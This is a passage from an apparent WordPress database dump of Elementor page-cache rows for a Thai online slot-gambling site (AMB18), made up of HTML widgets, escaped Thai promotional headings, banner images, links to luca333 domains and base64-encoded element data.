lMzBcdTBlMDFcdTBlMzFcdTBlMWFcdTBlMDRcdTBlMTlcdTBlMTdcdTBlMzVcdTBlNDhcdTBlMTVcdTBlNDlcdTBlMmRcdTBlMDdcdTBlMDFcdTBlMzJcdTBlMjNcdTBlMTdcdTBlMzFcdTBlNDlcdTBlMDdcdTBlMDRcdTBlMjdcdTBlMzJcdTBlMjFcdTBlMTlcdTBlNDhcdTBlMzJcdTBlMjNcdTBlMzFcdTBlMDFcdTBlNDFcdTBlMjVcdTBlMzBcdTBlNDJcdTBlMmRcdTBlMDFcdTBlMzJcdTBlMmFcdTBlMjNcdTBlMzFcdTBlMWFcdTBlMjNcdTBlMzJcdTBlMDdcdTBlMjdcdTBlMzFcdTBlMjVcdTBlMmFcdTBlMzlcdTBlMDcgXHUwZTQwXHUwZTIxXHUwZTM3XHUwZTQ4XHUwZTJkXHUwZTQwXHUwZTI1XHUwZTQ4XHUwZTE5XHUwZTFjXHUwZTQ4XHUwZTMyXHUwZTE5XHUwZTE3XHUwZTMyXHUwZTA3XHUwZTQwXHUwZTI3XHUwZTQ3XHUwZTFhXHUwZTFjXHUwZTM5XHUwZTQ5XHUwZTQwXHUwZTI1XHUwZTQ4XHUwZTE5XHUwZTA4XHUwZTMwXHUwZTJhXHUwZTMxXHUwZTIxXHUwZTFjXHUwZTMxXHUwZTJhXHUwZTQ0XHUwZTE0XHUwZTQ5XHUwZTE2XHUwZTM2XHUwZTA3XHUwZTA0XHUwZTI3XHUwZTMyXHUwZTIxXHUwZTI1XHUwZTM3XHUwZTQ4XHUwZTE5XHUwZTQ0XHUwZTJiXHUwZTI1XHUwZTAyXHUwZTJkXHUwZTA3XHUwZTIzXHUwZTMwXHUwZTFhXHUwZTFhXHUwZTQxXHUwZTI1XHUwZTMwXHUwZTAxXHUwZTMyXHUwZTIzXHUwZTE1XHUwZTJkXHUwZTFhXHUwZTJhXHUwZTE5XHUwZTJkXHUwZTA3XHUwZTE3XHUwZTM1XHUwZTQ4XHUwZTIzXHUwZTI3XHUwZTE0XHUwZTQwXHUwZTIzXHUwZTQ3XHUwZTI3PFwvc3Bhbj48XC9wPiJ9LCJlbGVtZW50cyI6W10sIndpZGdldFR5cGUiOiJ0ZXh0LWVkaXRvciJ9\\\"]\\t\\t<div class=\\\"elementor-element elementor-element-c0fa625 elementor-widget elementor-widget-image\\\" data-id=\\\"c0fa625\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"1200\\\" height=\\\"500\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-1-1.webp\\\" class=\\\"attachment-full size-full wp-image-352\\\" alt=\\\"\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-1-1.webp 1200w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-1-1-300x125.webp 300w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-1-1-1024x427.webp 1024w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-1-1-768x320.webp 768w\\\" sizes=\\\"(max-width: 1200px) 100vw, 1200px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-49411b8 elementor-widget elementor-widget-heading\\\" data-id=\\\"49411b8\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h2 class=\\\"elementor-heading-title elementor-size-default\\\">AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35<\\/h2>\\t\\t\\t\\t<\\/div>\\n\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6IjAzNTAzMmQiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD48c3BhbiBzdHlsZT1cImZvbnQtd2VpZ2h0OiA0MDA7XCI+XHUwZTQwXHUwZTI3XHUwZTQ3XHUwZTFhXHUwZTE5XHUwZTMzXHUwZTQwXHUwZTAyXHUwZTQ5XHUwZTMyXHUwZTQwXHUwZTFiXHUwZTM0XHUwZTE0XHUwZTE1XHUwZTI1XHUwZTJkXHUwZTE0XHUwZTQwXHUwZTI3XHUwZTI1XHUwZTMyXHUwZTQwXHUwZTI1XHUwZTQ4XHUwZTE5XHUwZTJhXHUwZTFhXHUwZTMyXHUwZTIyIDxcL3NwYW4+PGI+XHUwZTJhXHUwZTI1XHUwZTQ3XHUwZTJkXHUwZTE1IFx1MGU0MVx1MGUxNVx1MGUwMSBcdTBlMDdcdTBlNDhcdTBlMzJcdTBlMjIgXHUwZTE3XHUwZTM4XHUwZTE5IFx1MGUxOVx1MGU0OVx1MGUyZFx1MGUyMiBcdTBlMjdcdTBlMmQgXHUwZTQwXHUwZTI1XHUwZTE3IDxcL2I+PHNwYW4gc3R5bGU9XCJmb250LXdlaWdodDogNDAwO1wiPlx1MGUyMVx1MGUzMlx1MGUxZVx1MGUyM1x1MGU0OVx1MGUyZFx1MGUyMVx1MGU0Mlx1MGUyYlx1MGUyMVx1MGUxNFx1MGU0MFx1MGUxNFx1MGU0Mlx1MGUyMVx1MGU0OFx1MGUxZlx1MGUyM1x1MGUzNSBcdTBlMTVcdTBlMmRcdTBlMWFcdTBlNDJcdTBlMDhcdTBlMTdcdTBlMjJcdTBlNGNcdTBlMTdcdTBlMzFcdTBlNDlcdTBlMDdcdTBlMmFcdTBlMzJcdTBlMjJcdTBlMDhcdTBlMjNcdTBlMzRcdTBlMDdcdTBlMDhcdTBlMzFcdTBlMDdcdTBlNDFcdTBlMjVcdTBlMzBcdTBlMmFcdTBlMzJcdTBlMjJcdTBlMTdcdTBlMTRcdTBlMjVcdTBlMmRcdTBlMDcgXHUwZTQwXHUwZTFlXHUwZTIzXHUwZTMyXHUwZTMwXHUwZTIxXHUwZTM1XHUwZTQyXHUwZTJiXHUwZTIxXHUwZTE0XHUwZTQwXHUwZTE0XHUwZTQyXHUwZTIxXHUwZTQ4XHUwZTQzXHUwZTJiXHUwZTQ5XHUwZTI1XHUwZTJkXHUwZTA3XHUwZTQwXHUwZTI1XHUwZTQ4XHUwZTE5XHUwZTAxXHUwZTQ4XHUwZTJkXHUwZTE5XHUwZTE1XHUwZTMxXHUwZTE0XHUwZTJhXHUwZTM0XHUwZTE5XHUwZTQzXHUwZTA4XHUwZTI1XHUwZTA3XHUwZTQwXHUwZTA3XHUwZTM0XHUwZTE5XHUwZTA4XHUwZTIzXHUwZTM0XHUwZTA3IFx1MGUwYVx1MGU0OFx1MGUyN1x1MGUyMlx1MGU0M1x1MGUyYlx1MGU0OVx1MGUxY1x1MGUzOVx1MGU0OVx1MGU0MFx1MGUyNVx1MGU0OFx1MGUxOVx1MGUyOFx1MGUzNlx1MGUwMVx1MGUyOVx1MGUzMlx1MGU0MFx1MGUwMVx1MGUyMVx1MGU0MVx1MGUyNVx1MGUzMFx1MGUyN1x1MGUzMlx1MGUwN1x1MGU0MVx1MGUxY1x1MGUxOVx1MGUwMVx1MGUzMlx1MGUyM1x1MGUyYVx1MGUxYlx1MGUzNFx1MGUxOVx1MGU0NFx1MGUxNFx1MGU0OVx1MGU0MVx1MGUyMVx1MGU0OFx1MGUxOVx1MGUyMlx1MGUzM1x1MGUyMVx1MGUzMlx1MGUwMVx1MGUwMlx1MGUzNlx1MGU0OVx1MGUxOSBcdTBlMjNcdTBlMzBcdTBlMWFcdTBlMWFcdTBlMjNcdTBlMmRcdTBlMDdcdTBlMjNcdTBlMzFcdTBlMWFcdTBlMDFcdTBlMzJcdTBlMjNcdTBlMWRcdTBlMzJcdTBlMDFcdTBlMWNcdTBlNDhcdTBlMzJcdTBlMTlcdTBlMjdcdTBlMmRcdTBlNDBcdTBlMjVcdTBlMTcgXHUwZTE3XHUwZTMzXHUwZTQzXHUwZTJiXHUwZTQ5XHUwZTE4XHUwZTM4XHUwZTIzXHUwZTAxXHUwZTIzXHUwZTIzXHUwZTIxXHUwZTJhXHUwZTMwXHUwZTE0XHUwZTI3XHUwZTAxXHUwZTQxXHUwZTI1XHUwZTMwXHUwZTIzXHUwZTI3XHUwZTE0XHUwZTQwXHUwZTIzXHUwZTQ3XHUwZTI3IFx1MGU0MFx1MGUxYlx1MGUzNFx1MGUxNFx1MGU0M1x1MGUyYlx1MGU0OVx1MGUxYVx1MGUyM1x1MGUzNFx1MGUwMVx1MGUzMlx1MGUyM1x1MGUxNVx1MGUyNVx1MGUyZFx1MGUxNCAyNCBcdTBlMGFcdTBlMzFcdTBlNDhcdTBlMjdcdTBlNDJcdTBlMjFcdTBlMDcgXHUwZTQ0XHUwZTIxXHUwZTQ4XHUwZTI3XHUwZTQ4XHUwZTMyXHUwZTA4XHUwZTMwXHUwZTQwXHUwZTI1XHUwZTQ4XHUwZTE5XHUwZTQwXHUwZTI3XHUwZTI1XHUwZTMyXHUwZTQ0XHUwZTJiXHUwZTE5XHUwZTAxXHUwZTQ3XHUwZTQwXHUwZTAyXHUwZTQ5XHUwZTMyXHUwZTQzXHUwZTBhXHUwZTQ5XHUwZTA3XHUwZTMyXHUwZTE5XHUwZTQ0XHUwZTE0XHUwZTQ5XHUwZTE3XHUwZTMxXHUwZTE5XHUwZTE3XHUwZTM1IFx1MGUwNFx1MGUyN1x1MGUzMlx1MGUyMVx1MGUwNFx1MGUyM1x1MGUxYVx1MGU0MFx1MGUwNFx1MGUyM1x1MGUzN1x1MGU0OFx1MGUyZFx1MGUwN1x1MGUxN1x1MGUzMVx1MGU0OVx1MGUwN1x1MGUyYlx1MGUyMVx1MGUxNFx1MGUxOVx1MGUzNVx1MGU0OVx1MGUxN1x1MGUzM1x1MGU0M1x1MGUyYlx1MGU0OVx1MGUwMVx1MGUzMlx1MGUyM1x1MGU0MFx1MGUwMlx1MGU0OVx1MGUzMlx1MGU0MFx1MGUyNVx1MGU0OFx1MGUxOVx1MGUwMVx1MGUzMVx1MGUxYVx1MGUxN1x1MGUzMlx1MGUwN1x1MGU0MFx1MGUyN1x1MGU0N1x1MGUxYVx1MGUxOVx1MGUzNVx1MGU0OVx1MGUwMVx1MGUyNVx1MGUzMlx1MGUyMlx1MGU0MFx1MGUxYlx1MGU0N1x1MGUxOVx1MGUyZFx1MGUzNVx1MGUwMVx1MGUyYlx1MGUxOVx1MGUzNlx1MGU0OFx1MGUwN1x1MGU0MVx1MGUxZVx1MGUyNVx1MGUxNVx1MGUxZlx1MGUyZFx1MGUyM1x1MGU0Y1x1MGUyMVx1MGUxN1x1MGUzNVx1MGU0OFx1MGUxNVx1MGUyZFx1MGUxYVx1MGU0Mlx1MGUwOFx1MGUxN1x1MGUyMlx1MGU0Y1x1MGUwNFx1MGUxOVx1MGUyM1x1MGUzOFx1MGU0OFx1MGUxOVx1MGU0M1x1MGUyYlx1MGUyMVx1MGU0OFx1MGUxN1x1MGUzNVx1MGU0OFx1MGUxNVx1MGU0OVx1MGUyZFx1MGUwN1x1MGUwMVx1MGUzMlx1MGUyM1x1MGUwNFx1MGUyN1x1MGUzMlx1MGUyMVx1MGUyYVx1MGUzMFx1MGUxNFx1MGUyN1x1MGUwMSBcdTBlMmJcdTBlMzJcdTBlMDFcdTBlMmRcdTBlMjJcdTBlMzJcdTBlMDFcdTBlMjFcdTBlMzJcdTBlMTdcdTBlMTRcdTBlMjVcdTBlMmRcdTBlMDdcdTBlNDBcdTBlMjVcdTBlNDhcdTBlMTlcdTBlNDFcdTBlMjVcdTBlMzBcdTBlNDRcdTBlMjFcdTBlNDhcdTBlMjNcdTBlMzlcdTBlNDlcdTBlMDhcdTBlMzBcdTBlNDBcdTBlMjNcdTBlMzRcdTBlNDhcdTBlMjFcdTBlMTVcdTBlNDlcdTBlMTlcdTBlMmRcdTBlMjJcdTBlNDhcdTBlMzJcdTBlMDdcdTBlNDRcdTBlMjMgXHUwZTQwXHUwZTFlXHUwZTM1XHUwZTIyXHUwZTA3XHUwZTQxXHUwZTA0XHUwZTQ4XHUwZTQxXHUwZTJkXHUwZTE0IDxcL3NwYW4+PGEgaHJlZj1cImh0dHA6XC9cL2x1Y2EzMzNsaW5lLmNvbVwiPjxiPlx1MGU0NFx1MGUyNVx1MGUxOVx1MGU0YzxcL2I+PFwvYT48c3BhbiBzdHlsZT1cImZvbnQtd2VpZ2h0OiA0MDA7XCI+IFx1MGUyYVx1MGUzMlx1MGUyMVx1MGUzMlx1MGUyM1x1MGUxNlx1MGUxN1x1MGUzNVx1MGU0OFx1MGUwOFx1MGUzMFx1MGUyYVx1MGUyZFx1MGUxYVx1MGUxNlx1MGUzMlx1MGUyMVx1MGUwMlx1MGU0OVx1MGUyZFx1MGUyMVx1MGUzOVx1MGUyNVx1MGU0MFx1MGUxZVx1MGUzNFx1MGU0OFx1MGUyMVx1MGU0MFx1MGUxNVx1MGUzNFx1MGUyMVx1MGU0M1x1MGUxOVx1MGUwMVx1MGUzMlx1MGUyM1x1MGU0MFx1MGUwMlx1MGU0OVx1MGUzMlx1MGU0MFx1MGUyNVx1MGU0OFx1MGUxOVx1MGU0NFx1MGUxNFx1MGU0OTxcL3NwYW4+PFwvcD4ifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ==\\\"]\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/section>\\n\\t\\t\\t\\t<section class=\\\"elementor-section elementor-top-section elementor-element elementor-element-5bc1ff1d elementor-section-full_width elementor-section-content-middle elementor-section-height-default elementor-section-height-default\\\" data-id=\\\"5bc1ff1d\\\" data-element_type=\\\"section\\\" data-e-type=\\\"section\\\" data-settings=\\\"{"background_background":"gradient"}\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-container elementor-column-gap-default\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-12c0324a\\\" data-id=\\\"12c0324a\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6IjM4MWM1NTQ5IiwiZWxUeXBlIjoid2lkZ2V0Iiwic2V0dGluZ3MiOnsiZWRpdG9yIjoiPHAgY2xhc3M9XCJwMVwiIHN0eWxlPVwidGV4dC1hbGlnbjogY2VudGVyO1wiPjxzcGFuIHN0eWxlPVwiY29sb3I6ICNmZjY2MDA7XCI+PGEgc3R5bGU9XCJjb2xvcjogI2ZmNjYwMDtcIiBocmVmPVwiaHR0cDpcL1wvbHVjYTMzMy5uZXRcIiB0YXJnZXQ9XCJfYmxhbmtcIiByZWw9XCJub29wZW5lclwiPjxzdHJvbmc+THVjYTMzMzxcL3N0cm9uZz48XC9hPjxcL3NwYW4+PFwvcD4ifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ==\\\"]\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/section>\\n\\t\\t\",\"scripts\":[],\"styles\":[]}}'),(3579,441,'_elementor_page_assets','a:0:{}'),(3580,414,'_elementor_page_assets','a:0:{}'),(3581,412,'_elementor_page_assets','a:0:{}'),(3582,16,'_elementor_page_assets','a:2:{s:6:\"styles\";a:3:{i:0;s:12:\"widget-image\";i:1;s:24:\"e-animation-pulse-shrink\";i:2;s:14:\"widget-heading\";}s:7:\"scripts\";a:1:{i:0;s:18:\"elementor-frontend\";}}'),(3583,16,'_elementor_css','a:6:{s:4:\"time\";i:1788460945;s:5:\"fonts\";a:1:{i:0;s:6:\"Prompt\";}s:5:\"icons\";a:1:{i:0;s:0:\"\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3584,16,'_elementor_element_cache','{\"timeout\":1788665157,\"value\":{\"content\":\"\\t\\t<section class=\\\"elementor-section elementor-top-section elementor-element elementor-element-598df98 elementor-section-boxed elementor-section-height-default elementor-section-height-default\\\" data-id=\\\"598df98\\\" data-element_type=\\\"section\\\" data-e-type=\\\"section\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-container elementor-column-gap-default\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1de4a1b\\\" data-id=\\\"1de4a1b\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-dd4f8a9 elementor-widget elementor-widget-image\\\" data-id=\\\"dd4f8a9\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<a href=\\\"https:\\/\\/luca333auto.com\\/\\\">\\n\\t\\t\\t\\t\\t\\t\\t<img width=\\\"1200\\\" height=\\\"500\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Demo-play-slot-Banner-AMB18.webp\\\" class=\\\"attachment-full size-full wp-image-354\\\" alt=\\\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Demo-play-slot-Banner-AMB18.webp 1200w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Demo-play-slot-Banner-AMB18-300x125.webp 300w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Demo-play-slot-Banner-AMB18-1024x427.webp 1024w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Demo-play-slot-Banner-AMB18-768x320.webp 768w\\\" sizes=\\\"(max-width: 1200px) 100vw, 1200px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t<\\/a>\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/section>\\n\\t\\t\\t\\t<section class=\\\"elementor-section elementor-top-section elementor-element elementor-element-aaa47de elementor-section-boxed elementor-section-height-default elementor-section-height-default\\\" data-id=\\\"aaa47de\\\" data-element_type=\\\"section\\\" data-e-type=\\\"section\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-container elementor-column-gap-default\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-2a7956e\\\" data-id=\\\"2a7956e\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-a97ca87 elementor-align-justify elementor-widget elementor-widget-button\\\" data-id=\\\"a97ca87\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-settings=\\\"{"_animation":"none"}\\\" data-widget_type=\\\"button.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<a class=\\\"elementor-button elementor-button-link elementor-size-sm elementor-animation-pulse-shrink\\\" href=\\\"https:\\/\\/luca333auto.com\\/\\\" target=\\\"_blank\\\">\\n\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-content-wrapper\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-text\\\">\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!<\\/span>\\n\\t\\t\\t\\t\\t<\\/span>\\n\\t\\t\\t\\t\\t<\\/a>\\n\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-d82bac9\\\" data-id=\\\"d82bac9\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-763d481 elementor-align-justify elementor-widget elementor-widget-button\\\" data-id=\\\"763d481\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-settings=\\\"{"_animation":"none"}\\\" data-widget_type=\\\"button.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<a class=\\\"elementor-button elementor-button-link elementor-size-sm elementor-animation-pulse-shrink\\\" href=\\\"https:\\/\\/amb18b.com\\/promotion\\/\\\" target=\\\"_blank\\\">\\n\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-content-wrapper\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-text\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/span>\\n\\t\\t\\t\\t\\t<\\/span>\\n\\t\\t\\t\\t\\t<\\/a>\\n\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/section>\\n\\t\\t\\t\\t<section class=\\\"elementor-section elementor-top-section elementor-element elementor-element-b45af85 elementor-section-boxed elementor-section-height-default elementor-section-height-default\\\" data-id=\\\"b45af85\\\" data-element_type=\\\"section\\\" data-e-type=\\\"section\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-container elementor-column-gap-default\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1bdd864\\\" data-id=\\\"1bdd864\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-6e50ba5 elementor-widget elementor-widget-heading\\\" data-id=\\\"6e50ba5\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h1 class=\\\"elementor-heading-title elementor-size-default\\\">\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 <\\/h1>\\t\\t\\t\\t<\\/div>\\n\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6IjZmOGNjOTciLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cCBkYXRhLXBtLXNsaWNlPVwiMCAwIFtdXCI+XHUwZTE3XHUwZTMyXHUwZTA3XHUwZTQwXHUwZTAyXHUwZTQ5XHUwZTMyXHUwZTQwXHUwZTI1XHUwZTQ4XHUwZTE5IEFNQjE4IFx1MGUwNFx1MGUzN1x1MGUyZFx1MGU0MVx1MGUxZVx1MGUyNVx1MGUxNVx1MGUxZlx1MGUyZFx1MGUyM1x1MGU0Y1x1MGUyMVx1MGUyYVx1MGUyNVx1MGU0N1x1MGUyZFx1MGUxNVx1MGUyZFx1MGUyZFx1MGUxOVx1MGU0NFx1MGUyNVx1MGUxOVx1MGU0Y1x1MGUyYVx1MGUzOFx1MGUxNFx1MGUyZVx1MGUyZFx1MGUxNVx1MGUxN1x1MGUzNVx1MGU0OFx1MGUwMVx1MGUzM1x1MGUyNVx1MGUzMVx1MGUwN1x1MGUyMVx1MGUzMlx1MGU0MVx1MGUyM1x1MGUwN1x1MGU0MVx1MGUxYVx1MGUxYVx1MGUyYlx1MGUyMlx1MGUzOFx1MGUxNFx1MGU0NFx1MGUyMVx1MGU0OFx1MGUyZFx1MGUyMlx1MGUzOVx1MGU0OFx1MGUwOFx1MGUzOFx1MGUxNFx1MGU0MFx1MGUxNFx1MGU0OFx1MGUxOVx1MGUwNFx1MGUzN1x1MGUyZFx1MGU0MFx1MGUxYlx1MGU0N1x1MGUxOVx1MGU0MFx1MGUyN1x1MGU0N1x1MGUxYVx1MGUxNVx1MGUyM1x1MGUwN1x1MGU0NFx1MGUyMVx1MGU0OFx1MGUxY1x1MGU0OFx1MGUzMlx1MGUxOVx1MGU0MFx1MGUyZFx1MGU0MFx1MGUyMlx1MGU0OFx1MGUxOVx1MGUxNVx1MGU0YyBcdTBlNDNcdTBlMGFcdTBlNDkgQVBJIFx1MGU0MVx1MGUxN1x1MGU0OVx1MGUwOFx1MGUzMlx1MGUwMSBVU0EgXHUwZTE3XHUwZTMzXHUwZTQzXHUwZTJiXHUwZTQ5XHUwZTIzXHUwZTMwXHUwZTFhXHUwZTFhXHUwZTI1XHUwZTM3XHUwZTQ4XHUwZTE5IFx1MGU0MFx1MGUyYVx1MGUxNlx1MGUzNVx1MGUyMlx1MGUyMyBcdTBlMjBcdTBlMzJcdTBlMWVcdTBlMDRcdTBlMjFcdTBlMGFcdTBlMzFcdTBlMTRcdTBlMDhcdTBlMzFcdTBlMTRcdTBlNDBcdTBlMTVcdTBlNDdcdTBlMjEgXHUwZTQxXHUwZTE2XHUwZTIxXHUwZTA4XHUwZTMxXHUwZTA3XHUwZTJiXHUwZTI3XHUwZTMwXHUwZTQxXHUwZTE1XHUwZTAxXHUwZTAxXHUwZTMzXHUwZTI1XHUwZTMxXHUwZTA3XHUwZTE0XHUwZTM1IFx1MGU0Mlx1MGUxNFx1MGUxOVx1MGU0M1x1MGUwOFx1MGUyYVx1MGUzMlx1MGUyMlx1MGUyYVx1MGUyNVx1MGU0N1x1MGUyZFx1MGUxNVx1MGUyMlx1MGUzOFx1MGUwNFx1MGU0M1x1MGUyYlx1MGUyMVx1MGU0OFx1MGUxN1x1MGUzNVx1MGU0OFx1MGUwYVx1MGUyZFx1MGUxYVx1MGUyZFx1MGUzMFx1MGU0NFx1MGUyM1x1MGU0NFx1MGUyNyBcdTBlNDYgXHUwZTQ0XHUwZTIxXHUwZTQ4XHUwZTE1XHUwZTQ5XHUwZTJkXHUwZTA3XHUwZTIzXHUwZTJkXHUwZTE5XHUwZTMyXHUwZTE5IFx1MGU0M1x1MGUxOVx1MGU0MFx1MGUyN1x1MGU0N1x1MGUxYVx1MGUyM1x1MGUyN1x1MGUyMVx1MGU0MFx1MGUwMVx1MGUyMVx1MGUxNVx1MGUzMVx1MGUyN1x1MGUxN1x1MGU0N1x1MGUyZFx1MGUxYlx1MGUwOFx1MGUzMlx1MGUwMVx1MGUyYlx1MGUyNVx1MGUzMlx1MGUyMlx1MGUwNFx1MGU0OFx1MGUzMlx1MGUyMlx1MGUxNFx1MGUzMVx1MGUwN1x1MGUyZFx1MGUzMVx1MGUxYlx1MGU0MFx1MGUxNFx1MGUxNVx1MGU0MFx1MGUwMVx1MGUyMVx1MGU0M1x1MGUyYlx1MGUyMVx1MGU0OFx1MGUxNVx1MGUyNVx1MGUyZFx1MGUxNFx1MGU0MFx1MGUyN1x1MGUyNVx1MGUzMiBcdTBlNDBcdTBlMDJcdTBlNDlcdTBlMzJcdTBlNDBcdTBlMjVcdTBlNDhcdTBlMTlcdTBlNDRcdTBlMTRcdTBlN